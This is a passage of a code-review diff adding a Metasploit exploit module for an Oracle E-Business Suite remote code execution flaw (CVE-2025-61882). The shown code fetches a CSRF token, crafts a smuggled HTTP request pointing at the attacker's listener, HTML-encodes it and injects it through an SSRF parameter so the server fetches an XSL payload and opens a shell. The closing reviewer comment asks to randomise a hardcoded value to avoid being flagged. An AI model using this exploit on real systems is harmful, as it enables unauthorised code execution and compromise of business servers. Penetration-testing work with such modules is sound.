modules/exploits/multi/http/oracle_ebs_cve_2025_61882_exploit_rce.rb

```diff
@@ -0,0 +1,418 @@
+            @session_created = true
+            break
+          end
+
+          sleep(1)
+          shell_waited += 1
+
+          if shell_waited % 5 == 0
+            vprint_status("Waiting for shell... (#{shell_waited}/#{shell_timeout}s)")
+          end
+        end
+
+        break
+      end
+
+      sleep(1)
+      waited += 1
+
+      # Activity feedback
+      if waited % 5 == 0
+        vprint_status("Waiting for XSL request... (#{waited}/#{timeout}s)")
+      end
+    end
+
+    unless @xsl_served
+      print_error("Timeout waiting for target to fetch XSL payload")
+    end
+
+    unless @session_created
+      if @xsl_served
+        print_error("XSL was delivered but no session was created")
+      end
+    end
+  end
+
+  def retrieve_csrf_token
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'runforms.jsp'),
+      'keep_cookies' => true
+    })
+
+    return nil unless res
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'OA_HTML', 'JavaScriptServlet'),
+      'headers' => {
+        'CSRF-XHR' => 'YES',
+        'FETCH-CSRF-TOKEN' => '1'
+      },
+      'keep_cookies' => true
+    })
+
+    if res && res.code == 200 && res.body
+      parts = res.body.split(':')
+      return parts[1].strip if parts.length >= 2
+    end
+
+    nil
+  rescue ::Rex::ConnectionError, ::Timeout::Error => e
+    vprint_error("Connection failed: #{e.class}")
+    nil
+  end
+
+  def create_smuggle_payload(xsl_url)
+
+    srvhost = datastore['SRVHOST']
+    srvport = datastore['SRVPORT']
+
+    if srvhost == '0.0.0.0'
+      srvhost = Rex::Socket.source_address(rhost)
+    end
+
+    smuggle_request = "POST /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.2\r\n"
+    smuggle_request += "Host: #{srvhost}:#{srvport}\r\n"
+    smuggle_request += "User-Agent: #{Rex::Text.rand_text_alpha(10)}\r\n"
+    smuggle_request += "Connection: keep-alive\r\n"
+
+    # Add sessions cookies
+    cookies = get_cookies
+    if cookies && !cookies.empty?
+      smuggle_request += "Cookie: #{cookies}\r\n"
+    end
+
+    # Add POST request via CRLF
+    smuggle_request += "\r\n\r\n\r\nPOST /"
+
+    vprint_status("Smuggled request will target: #{srvhost}:#{srvport}")
+    vprint_status("Full smuggled request:")
+    vprint_line(smuggle_request) if datastore['VERBOSE']
+
+    # Encode payload in HTML entities
+    cook_smuggle_stub(smuggle_request)
+  end
+
+  def cook_smuggle_stub(payload)
+    payload = payload.sub(/^(?:POST|GET) /, '')
+
+    # Encode in HTML entities
+    payload = Rex::Text.html_encode(payload)
+    
+  end
+
+  def send_exploit_request(encoded_payload)
+    # Encoded payload is inserted in return_url (SSRF)
+    
+    xml = %Q|<?xml version="1.0" encoding="UTF-8"?>\
+    <initialize>\
+    <param name="init_was_saved">test</param>\
+    <param name="return_url">http://apps.example.com:7201#{encoded_payload}</param>\
```

Comment:
Could we randomise this? It seems like an easy way to get flagged, unless this specific value is required?